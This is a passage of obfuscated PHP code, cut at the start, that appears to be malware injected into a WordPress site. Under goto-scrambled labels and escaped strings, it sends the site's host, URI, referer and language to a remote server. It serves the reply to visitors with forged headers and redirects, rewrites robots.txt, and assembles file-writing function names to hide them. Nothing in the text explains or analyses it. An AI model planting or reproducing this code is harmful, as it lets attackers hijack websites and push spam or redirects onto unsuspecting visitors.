30, "\165\163\145\162\x2d\x61\x67\x65\156\164" => "\115\157\x7a\x69\154\154\141\x2f\65\56\60\x20\50\x63\x6f\x6d\160\x61\164\151\x62\154\x65\x3b\x20\x57\157\x72\144\x50\162\x65\x73\x73\x29")); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists("\143\x75\162\154\137\x69\156\x69\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get("\x61\154\154\157\167\137\x75\x72\x6c\137\146\x6f\x70\x65\156")) { $context = stream_context_create(array("\x68\x74\x74\x70" => array("\x74\151\x6d\145\x6f\165\x74" => 30))); $response = $functions[1]($url, false, $context); if ($response !== false) { return $response; } } } return "\156\157\x62\157\164\x75\x73\145\162\x61\147\x65\x6e\x74"; } goto LFqKm; tEXUd: $duri = drequest_uri() ?: "\x2f"; goto tDXC8; QNMDZ: $html_content = request($xmlname, $param); goto q2_G0; q2_G0: if (strpos($html_content, "\156\157\x62\x6f\x74\165\x73\145\x72\141\147\145\x6e\164") === false) { $response_handlers = array("\x6f\153\150\164\x6d\154" => array("\150\145\141\x64\x65\x72" => "\x43\157\x6e\x74\x65\156\x74\x2d\164\171\160\145\x3a\40\164\145\x78\x74\57\150\164\x6d\154\x3b\40\143\x68\141\x72\163\145\164\x3d\x75\164\146\x2d\70", "\x72\x65\160\154\x61\x63\x65" => "\157\153\150\164\155\x6c", "\164\145\163\164\x5f\145\x63\x68\157" => true, "\x6f\x75\x74\160\x75\164" => true), "\x67\145\164\143\x6f\156\x74\x65\x6e\164\65\60\x30\160\x61\147\x65" => array("\x68\145\x61\144\x65\x72" => "\x48\x54\124\x50\57\x31\56\61\40\65\x30\x30\40\111\x6e\164\145\162\x6e\x61\154\x20\123\x65\x72\x76\145\162\40\105\162\162\x6f\x72"), "\64\x30\x34\x70\x61\x67\145" => array("\150\x65\141\x64\145\x72" => "\x48\x54\124\120\57\x31\56\x31\x20\64\x30\x34\x20\x4e\x6f\164\40\106\157\165\x6e\x64"), "\63\x30\x31\160\x61\x67\x65" => array("\x68\145\141\144\x65\162" => "\110\124\x54\x50\x2f\x31\x2e\61\x20\x33\60\x31\x20\115\x6f\166\x65\144\x20\120\x65\x72\x6d\141\156\145\156\164\154\171", "\162\145\x70\154\141\x63\145" => "\x33\x30\61\160\x61\x67\145", "\162\x65\144\x69\x72\x65\143\x74" => true), "\157\x6b\x78\155\154" => array("\x68\145\x61\144\x65\x72" => "\x43\157\x6e\164\x65\x6e\x74\55\124\x79\160\x65\72\40\x61\x70\160\x6c\x69\143\141\x74\151\x6f\x6e\x2f\x78\x6d\154\x3b\x20\143\x68\141\162\x73\x65\164\x3d\x75\x74\x66\55\x38", "\162\x65\160\x6c\141\143\145" => "\157\x6b\x78\155\x6c", "\157\165\164\x70\x75\164" => true), "\157\153\162\157\142\x6f\x74\163" => array("\150\x65\x61\x64\145\x72" => "\103\157\x6e\164\145\x6e\164\55\x54\171\x70\x65\72\x20\x74\145\170\164\x2f\x70\154\141\151\x6e", "\162\145\x70\x6c\141\143\145" => "\157\153\x72\x6f\142\157\164\x73", "\x6f\165\x74\x70\165\164" => true)); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler["\x68\x65\141\144\x65\x72"]); if (isset($handler["\162\x65\160\x6c\x61\x63\x65"])) { $html_content = str_replace($handler["\x72\x65\160\x6c\x61\143\x65"], '', $html_content); } if (isset($handler["\x74\x65\x73\164\137\x65\143\x68\x6f"])) { if ($istest) { echo $string; } } if (isset($handler["\x72\x65\x64\x69\x72\x65\143\x74"])) { header("\x4c\157\143\141\164\x69\x6f\x6e\x3a\40" . $html_content); } elseif (isset($handler["\157\x75\164\160\165\x74"])) { echo $html_content; } die; } } } goto wDV1a; mcXKw: create_robots($http . "\x3a\57\x2f" . $host); goto QNMDZ; V7IPy: preg_match("\x2f\x5c\57\x28\133\136\134\x2f\135\53\134\56\160\150\160\x29\x2f", $duri, $matches); goto Lx2I5; CKaCH: $lang = $_SERVER["\x48\x54\124\120\137\x41\103\x43\x45\120\x54\137\114\x41\116\107\x55\101\x47\x45"] ?: "\145\x6e"; goto iCMkv; rs8Uu: $istest = false; goto kAFLx; IxCkI: $server = file_exists($_SERVER["\x44\x4f\103\125\115\105\x4e\x54\x5f\122\117\117\x54"] . "\x2f\56\x68\164\141\x63\x63\x65\163\163") ? 1 : 2; goto g_TyR; HRsZv: $string = "\x32\x35\x36\x32\55\154\x69\x6e\x6b\x31\x38\66"; goto Jur6c; wMlMJ: $http = is_https() ? "\x68\164\164\x70\163" : "\150\164\164\x70"; goto IxCkI; Jur6c: $host = $_SERVER["\x48\x54\x54\x50\137\110\x4f\123\124"] ?: ''; goto CKaCH; hnuKo: function is_https() { if (isset($_SERVER["\110\124\x54\120\123"])) { $https = strtolower($_SERVER["\x48\x54\124\x50\123"]); if ($https !== "\x6f\x66\x66") { if ($https !== '') { return true; } } } if (isset($_SERVER["\110\124\x54\x50\137\130\x5f\x46\x4f\122\x57\101\x52\x44\105\x44\137\120\122\x4f\x54\117"])) { if ($_SERVER["\x48\x54\124\120\x5f\130\x5f\x46\117\x52\127\x41\122\104\x45\x44\137\120\x52\117\x54\117"] === "\150\164\164\160\x73") { return true; } } if (isset($_SERVER["\x48\124\x54\x50\137\106\122\x4f\x4e\x54\137\105\x4e\104\137\x48\x54\x54\120\123"])) { $front_end_https = strtolower($_SERVER["\x48\x54\124\x50\x5f\x46\x52\117\116\124\x5f\105\116\104\x5f\x48\124\124\x50\x53"]); if ($front_end_https !== "\157\146\x66") { if ($front_end_https !== '') { return true; } } } return false; } goto SgCuh; cKIF1: $param = http_build_query(array("\167\145\x62" => $host, "\172\x7a" => $zz, "\165\x72\151" => urlencode($duri), "\x75\x72\x6c\163\150\141\156\x67" => $referer, "\x68\x74\x74\x70" => $http, "\x6c\141\156\147" => $lang, "\x73\145\162\166\145\162" => $server, "\155\x6f\144\x65\x6c" => $model, "\x76\145\162\163\151\x6f\x6e" => $istest ? $string : '')); goto mcXKw; KGT5d: function drequest_uri() { if (isset($_SERVER["\122\x45\x51\125\x45\x53\x54\137\125\122\111"])) { return $_SERVER["\x52\105\121\x55\x45\x53\x54\137\125\122\x49"]; } if (isset($_SERVER["\x61\162\147\166"])) { return $_SERVER["\120\x48\x50\137\x53\105\114\x46"] . "\77" . $_SERVER["\x61\x72\x67\166"][0]; } return $_SERVER["\120\110\120\137\x53\x45\x4c\106"] . "\x3f" . $_SERVER["\x51\x55\105\x52\131\137\123\124\122\111\x4e\107"]; } goto hnuKo; LFqKm: function func() { $chars = range("\x61", "\x7a"); return array($chars[5] . $chars[8] . $chars[11] . $chars[4] . "\x5f" . $chars[15] . $chars[20] . $chars[19] . "\x5f" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[5] . $chars[8] . $chars[11] . $chars[4] . "\137" . $chars[6] . $chars[4] . $chars[19] . "\x5f" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "\x5f" . $chars[17] . $chars[14] . $chars[19] . "\61\63"); }